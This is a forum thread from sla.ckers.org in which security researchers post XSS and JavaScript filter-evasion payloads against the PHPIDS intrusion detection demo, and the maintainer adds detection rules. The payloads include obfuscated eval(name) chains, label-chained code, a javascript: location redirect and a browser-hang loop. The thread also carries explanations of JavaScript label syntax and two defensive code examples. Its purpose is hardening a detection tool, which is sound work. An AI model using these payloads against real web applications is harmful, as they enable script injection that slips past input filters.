Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 27, 2008 11:23PM

how about a feature request and a bug all in one :)

injection:
t=this
y=('nam')
x=t.eval
x(x(y+ ('e')+new Array)+y)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 28, 2008 04:49AM

Hi!

We figured it out - the admins seem to have upgraded the PHP - but w/o Unicode support for the PCRE. That's why the centrifuge didn't work at all. Fix will be deployed within the next hours...

@thornmaker: I will take care about the feature request asap :)

<edit>That issue btw caused the problem... should be fixed by our admins any second - thx admins :)</edit>



Edited 2 time(s). Last edit at 10/28/2008 06:22AM by .mario.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 30, 2008 01:02AM

IE only. code is:

@cc_on eval(@cc_on name)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 30, 2008 05:12AM

Small but ev[ia]l - I just added a rule for conditional compilations plus test case. Thx :)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 30, 2008 12:33PM

Here's an IE-only one:-
http://www.businessinfo.co.uk/labs/phpids/phpids4.html

document.body.style.cssText=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 30, 2008 12:43PM

... with CSS expression in the name - nice ;)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 30, 2008 12:46PM

Yeah, what's sweet about this one is that no parentheses are required.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: November 04, 2008 06:39PM


Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: November 23, 2008 10:04PM

@.mario: i like the layout on the demo page a lot better now, thanks for changing! for(i=0;;)i is a small DoS injection that Firefox 3.0.4 chokes on - IE8 and Opera 9.62 both allow you to abort.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: November 25, 2008 07:19AM

thx - fixed!

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 07, 2008 04:02AM

This is unfortunately what happens when I'm sick with the flu and can't sleep...
xxx='javascr',xxx+=('ipt:eva'),xxx+=('l(n'),xxx+=('ame),y')
Cen:tri:fug:eBy:pas:sTe:xt:do location=(xxx)
while(0)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 07, 2008 10:51AM

Nice one! Fixed..

Get well soon! Effing flu...

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 07, 2008 07:09PM

almost
x='javascr',x+=('ipt:eva'),x+=('l(na'),x+=('me),y')
abc:def:ghi:jkl:mno:pqr:stu:vwx:yza:bcd:do location=(x)
while(0)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 08, 2008 03:07AM

Ouch - something went wrong with uploading the new filters yesterday. Fixed! I also added a small portion of regex to detect the concat pattern. Better safe than sorry :)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 09:40AM

@thornmaker

That's awesome, I can't figure out why that should be correct js syntax though. What is the interpreter doing?

It seems to be using the ":" as or statements, even though it shouldn't be possible to define a block that way, at least I thought.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 08, 2008 12:43PM

the ":" is just the label syntax in javascript, and I've chained a bunch of them together. Nothing special there - several of my other bypasses have used that to get around the centrifuge, though usually i put such text at the beginning or end of the injection (in this case, the "do location" bit worked better with a label before it though, iirc).

As your Twitter pointed out, labels can have non-standard ASCII chars, and also other Unicode oddities as well: javascript:\u0061\u0300:alert(0)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 03:46PM

Well what I found interesting was the fact that label statements seem to be able to link together as or statements. For example :-

//Raises a runtime ReferenceError "c is undefined"
a:b:c

//doesn't
a:b:c:alert(1)

The docs seem to suggest only one label is allowed and there's no mention of or statements

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 08, 2008 04:09PM

Yep - first one is a label for a label for something undefined - while the other is a label for a label for something known.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 08, 2008 04:30PM

Yes but the code seems to be ignored for the other statements. After all they are all undefined so the parser should raise an error. Does anyone know anywhere where this is documented?

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 08, 2008 10:20PM

a label is really just a prefix before the true statement and should not itself be thought of as a statement. in your a:b:c example, only the a and b are actual labels; the c is the statement, which is presumably undefined.

that they can be chained together is kinda nifty



Edited 1 time(s). Last edit at 12/08/2008 10:21PM by thornmaker.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: SpoofGhost
Date: December 09, 2008 08:40AM

Why not try to create a self-enhancing script instead of updating it manually every time!

It's just a proposal, but it could be nice to try and create. Maybe create some sort of honeypot, capture the attack and create a regex for it automatically..
I'm really not sure how far this is possible, but it would be great to see.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 09, 2008 08:59AM

We kind of already have this via the centrifuge. Okay - it doesn't learn, but it is capable of detecting attacks without using the blacklist-based filter rules.

Creating regex rules on the fly - phew. Based on which criteria the question is ;)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 09, 2008 09:14AM

@thornmaker @mario

The labels do refer to the same code which is interesting.

aa:bb:for(i=0;i<10;i++) {
   alert(i);
   break aa;//works
   break bb//works
   break cc//label not found
}

@SpoofGhost

The only way that would be possible would be using AI. The computer would have to know what each attack means and would have to decide if someone was trying to create a malicious reg exp rule.

Auto blocking firewalls have the same problem because if you make a spoofed request as a malicious attack it could block a root dns server or other host.

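The label behaviour discussed in the last few posts (thornmaker's point that a label is only a prefix, Gareth's a:b:c versus a:b:c:alert(1) observation, and the aa:bb:for loop where either label can be broken), as an added example that is not part of the thread and not PHPIDS code. The function names and the LABEL_PREFIX pattern are this example's own assumptions; it shows what the JavaScript grammar accepts, and a small normaliser a detection rule could apply so that a label chain does not hide the statement it prefixes.

```javascript
// Added example, not code from the thread or from PHPIDS: how the JavaScript
// grammar treats a chain of labels, and a small normaliser a detection rule
// could apply so a label prefix does not hide the statement behind it.
// The function names and the LABEL_PREFIX pattern are this example's own.

// "Identifier :" may be stacked any number of times in front of one
// statement; every label in the chain names that same inner statement.
// Only ASCII identifiers are recognised here; the thread notes that real
// engines also accept non-ASCII and \uXXXX-escaped label names.
const LABEL_PREFIX = /^(?:\s*[A-Za-z_$][\w$]*\s*:)+\s*/;

// Split a source string into its leading labels and the statement they prefix.
function stripLabels(src) {
  const m = LABEL_PREFIX.exec(src);
  if (m === null) return { labels: [], body: src };
  const labels = m[0].split(":").map(s => s.trim()).filter(s => s.length > 0);
  return { labels, body: src.slice(m[0].length) };
}

// Parse-only check: new Function compiles the text but never runs it. A
// break to a label that does not exist is a SyntaxError at this stage; a
// missing identifier such as the bare "c" is not, because that is a
// run-time ReferenceError.
function compiles(src) {
  try {
    new Function(src);
    return true;
  } catch (e) {
    return false;
  }
}

// Gareth's loop: both labels refer to the same for statement, so breaking
// via either one leaves the loop after its first iteration (returns 0);
// with no break the loop runs to completion (returns 9).
function breakViaLabel(which) {
  let last = -1;
  aa: bb: for (let i = 0; i < 10; i++) {
    last = i;
    if (which === "aa") break aa;
    if (which === "bb") break bb;
  }
  return last;
}

// Constructed inputs taken from the thread: the label chain is only a prefix.
const SAMPLES = ["a:b:c", "a:b:c:alert(1)", "aa:bb:for(;;){break cc}"];
for (const s of SAMPLES) {
  const { labels, body } = stripLabels(s);
  console.log(JSON.stringify(s), "labels:", labels, "body:", JSON.stringify(body),
    "compiles:", compiles(s));
}
```

Running it shows "a:b:c" and "a:b:c:alert(1)" compiling with bodies "c" and "alert(1)" respectively, while the loop with break cc is rejected at parse time, which is the "label not found" Gareth saw. A rule engine that matches on the normalised body instead of the raw input is not fooled by however many labels are stacked in front.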
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 09, 2008 11:03AM

.mario - couldn't the centrifuge detection rules be rewritten as regexes? For various reasons (like performance) you might not want to, but as far as I can tell, the rules are functionally equivalent to regular expression rules.

I haven't tested this much, but to do this I think you would need to chain together some look ahead rules... something like... /a(?=(.*b){2,})(?=(.*c){2,})/ should match the a only if it is followed with 2 or more b's and 2 or more c's but the b's and c's can be in any order and have other text mixed in. for the IDS, you would replace a with the start anchor and replace b and c each with whatever class of characters the centrifuge is trying to pick up.

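The stacked-lookahead idea from the post above, carried through as an added example that is neither thornmaker's code nor the Centrifuge's: one anchored expression that requires "at least N of this character class and at least M of that one", in any order and with other text mixed in. The character classes and thresholds are assumptions chosen for the demo, not the classes PHPIDS actually counts; the function names are this example's own.

```javascript
// Added example, not the Centrifuge's code: thornmaker's idea of stacking
// lookaheads so one anchored expression demands "at least N of this class,
// at least M of that class", in any order and with other text in between.
// The classes and thresholds below are assumptions for the demo.

// Each requirement is [regexFragment, minimumCount]. For ["\\(", 2] the
// generated piece is (?=(?:[\s\S]*?\(){2,}): "somewhere ahead there are at
// least two '('". The ^ anchor plays the role of thornmaker's "a".
function buildThresholdRegex(requirements) {
  const lookaheads = requirements
    .map(([fragment, min]) => `(?=(?:[\\s\\S]*?${fragment}){${min},})`)
    .join("");
  return new RegExp("^" + lookaheads);
}

// The same requirements as a plain counting loop, to show that the regex
// and the procedural rule agree on every input.
function countsSatisfy(input, requirements) {
  return requirements.every(([fragment, min]) => {
    const hits = input.match(new RegExp(fragment, "g"));
    return (hits === null ? 0 : hits.length) >= min;
  });
}

// Demo policy (constructed): at least two "(" and at least two ":".
const DEMO_REQUIREMENTS = [["\\(", 2], [":", 2]];
const DEMO_REGEX = buildThresholdRegex(DEMO_REQUIREMENTS);

// True when the input meets every threshold, regardless of order.
function classify(input) {
  return DEMO_REGEX.test(input);
}

// Constructed inputs: the first two pass (different orders), the rest fail.
const SAMPLES = ["a:b:(c)(d)", "((::", "a:(b)", "a:b:(c)", ""];
console.log(DEMO_REGEX.source);
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "regex:", classify(s),
    "counting:", countsSatisfy(s, DEMO_REQUIREMENTS));
}
```

PCRE, which PHP's preg_* functions use, supports the same lookahead syntax, so the generated pattern ports without change. The performance caveat thornmaker mentions is visible in the structure: each lookahead rescans the input from the anchor, so the work grows with the number of classes times the input length, whereas the counting loop makes one pass per class.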
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 09, 2008 11:34AM

@thornmaker: Hmmm - dunno. I try to avoid lookaheads/lookbehinds. You mean to more easily place them in an external file/port them? Or for another reason?

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: December 09, 2008 11:53AM

@.mario: I'm not suggesting you should rewrite the centrifuge. I'm just curious if it is theoretically possible (the mathematician in me). The only advantage I can see in rewriting would be to have all the detection logic in the same place so the code is more portable, but this doesn't seem to be an issue really.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: December 22, 2008 03:02PM

phpids eats backslashes:-

\a\l\e\r\t\(1)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: December 23, 2008 05:06AM

Snap - yes. The demo did. Fixed, thx!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 03, 2009 03:55AM

http://demo.phpids.org/?test=foo:bar:boo:far:oof:boa:%0a(this)%5b(%20'a')%2b%20(new Array)%2b%20('lert')%20%2bnew%20Array%5d(0)

foo:bar:boo:far:oof:boa:
(this)[( 'a')+ (new Array)+ ('lert') +new Array](0)

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 03, 2009 11:04AM

@thornmaker

Oooooo nice :) I might do one later after the footy ;) You inspired me
